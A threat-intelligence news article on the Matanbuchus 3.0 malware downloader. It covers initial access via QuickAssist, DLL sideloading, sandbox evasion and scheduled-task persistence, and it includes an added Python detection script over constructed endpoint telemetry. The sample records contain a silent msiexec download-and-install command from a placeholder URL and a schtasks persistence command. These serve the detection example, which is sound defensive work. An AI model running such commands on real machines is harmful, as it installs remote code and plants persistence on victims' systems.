A sophisticated C++ downloader known as Matanbuchus has resurfaced with a major technical overhaul, signaling a dangerous new phase in its lifecycle. Zscaler ThreatLabz identified “version 3.0 of Matanbuchus” in the wild as of July 2025, revealing that the malware has moved beyond its origins as a simple downloader to become a critical gateway for ransomware operators.
First observed in 2020, Matanbuchus operates as a “Malware-as-a-Service (MaaS),” renting its infrastructure to various cybercriminals. However, this latest iteration marks a strategic pivot. While it retains its core ability to “deploy additional payloads and perform hands-on keyboard activity via shell commands,” researchers warn that “despite its simplicity, Matanbuchus has been more recently associated with ransomware operations”.
ThreatLabz confirmed this escalation, stating they have “observed Matanbuchus deployments consistent with hands-on-keyboard ransomware operations.”

The new campaign relies on direct human interaction to bypass security perimeters. In one analyzed case, the threat actor utilized QuickAssist—a legitimate Microsoft remote support tool—likely “in conjunction with social engineering” to gain initial access to a victim’s machine.
Once connected, the attacker manually “used the command-line to download and execute a malicious Microsoft Installer (MSI) package from gpa-cro[.]com.”
This installer drops an executable named HRUpdate.exe, which uses DLL sideloading (a trusted executable loading an attacker-supplied DLL placed alongside it) to launch the Matanbuchus downloader module.
The developers behind Matanbuchus v3.0 have significantly modernized its architecture to evade analysis. A key technical upgrade is the adoption of Protocol Buffers (Protobufs), a data format used “for serializing network communication data”.
To frustrate security researchers and automated sandboxes, the malware employs aggressive obfuscation:
- Junk Code: “Matanbuchus embeds multiple blocks of junk instructions in its codebase to hinder analysis.”
- Time-Wasting Loops: The downloader executes “long-running loops” or “busy loops” that “delay the downloader’s functionality for several minutes after initial execution, allowing it to evade behavioral analysis by sandboxes”, which typically stop observing before the malware activates.
- Encryption: It uses the ChaCha20 stream cipher to decrypt strings and network payloads.
Once inside, Matanbuchus ensures it stays. It downloads shellcode that creates a scheduled task named “Update Tracker Task,” allowing the malware to survive system reboots.
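The chain described above leaves three observables in endpoint telemetry: msiexec.exe fetching an installer from a URL, the HRUpdate.exe launcher appearing on disk, and a scheduled task named “Update Tracker Task”. The detection helper below turns them into rules and runs them over constructed sample records; it is an added example, not Zscaler ThreatLabz's or the article's code. Only the task name and the launcher file name come from the article; the event record shapes (loosely modelled on Sysmon Event ID 1 and Security Event ID 4698), the `example.invalid` URL and every other sample value are constructed here.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple, Union

# Names taken from the article. Everything else in this file is constructed.
LAUNCHER_NAME = "hrupdate.exe"            # sideloading launcher dropped by the MSI
PERSISTENCE_TASK = "update tracker task"  # scheduled task created by the downloaded shellcode


@dataclass
class ProcessCreate:
    """Simplified process-creation record (fields modelled on Sysmon Event ID 1)."""
    image: str
    command_line: str
    parent_image: str


@dataclass
class TaskCreate:
    """Simplified task-registration record (modelled on Security Event ID 4698).

    The article says shellcode creates the task, so it may never pass through
    schtasks.exe; the task-registration log is the reliable source for that case.
    """
    task_name: str
    author: str


Event = Union[ProcessCreate, TaskCreate]
Finding = Tuple[str, str]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# schtasks /tn takes either a quoted name or a single token
TASKNAME_RE = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Finding]:
    """Return (rule, evidence) pairs for events matching the Matanbuchus chain."""
    findings: List[Finding] = []
    for ev in events:
        if isinstance(ev, ProcessCreate):
            image = basename(ev.image)
            cmd = ev.command_line
            # 1. msiexec pulling an installer straight from a URL: the manual
            #    download-and-execute step performed over the remote-support session.
            if image == "msiexec.exe":
                url = URL_RE.search(cmd)
                if url:
                    findings.append(("remote_msi_install", url.group(0)))
            # 2. The known launcher file name. Weak on its own (trivially renamed);
            #    useful for triage next to the behavioural rules, so record its parent.
            if image == LAUNCHER_NAME:
                findings.append(("known_launcher_name", f"{ev.image} <- {ev.parent_image}"))
            # 3. Persistence registered through schtasks.exe.
            if image == "schtasks.exe" and "/create" in cmd.lower():
                m = TASKNAME_RE.search(cmd)
                name = (m.group(1) or m.group(2)) if m else ""
                if name.strip("\\").lower() == PERSISTENCE_TASK:
                    findings.append(("persistence_task", name))
        elif isinstance(ev, TaskCreate):
            # 3b. The same task seen in the task-registration log (API-created tasks).
            if ev.task_name.strip("\\").lower() == PERSISTENCE_TASK:
                findings.append(("persistence_task", ev.task_name))
    return findings


# Constructed sample telemetry: the three malicious steps plus two benign records.
SAMPLE_EVENTS: List[Event] = [
    ProcessCreate(r"C:\Windows\System32\msiexec.exe",
                  "msiexec.exe /i https://example.invalid/update.msi /qn",  # placeholder URL
                  r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(r"C:\Users\Public\HRUpdate.exe", "HRUpdate.exe",
                  r"C:\Windows\System32\msiexec.exe"),
    ProcessCreate(r"C:\Windows\System32\schtasks.exe",
                  'schtasks /create /tn "Update Tracker Task" /tr C:\\Users\\Public\\HRUpdate.exe /sc onlogon',
                  r"C:\Users\Public\HRUpdate.exe"),
    TaskCreate(r"\Update Tracker Task", r"VICTIM-PC\user"),
    ProcessCreate(r"C:\Windows\System32\msiexec.exe",
                  r"msiexec.exe /i C:\Temp\vendor-tool.msi /qn",
                  r"C:\Windows\explorer.exe"),                              # benign local install
    TaskCreate(r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SYSTEM"),   # benign task
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:22} {evidence}")
```

Of the three rules, the remote MSI install is the one worth alerting on by itself: a URL in an msiexec.exe command line is rare in most estates and is the point in this chain where the operator is still hands-on and the task has not yet been registered. The task name and launcher name are sample-specific and belong in a watchlist that is expected to change.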
The malware acts as a mothership for other threats. Zscaler observed campaigns where Matanbuchus distributed “the Rhadamanthys information stealer and the NetSupport RAT,” further compromising the victim’s network and data.
Matanbuchus 3.0 represents a mature, versatile threat that has successfully adapted to modern defenses. By combining social engineering tools like QuickAssist with advanced obfuscation techniques, it provides a stable foothold for ransomware gangs to launch devastating attacks.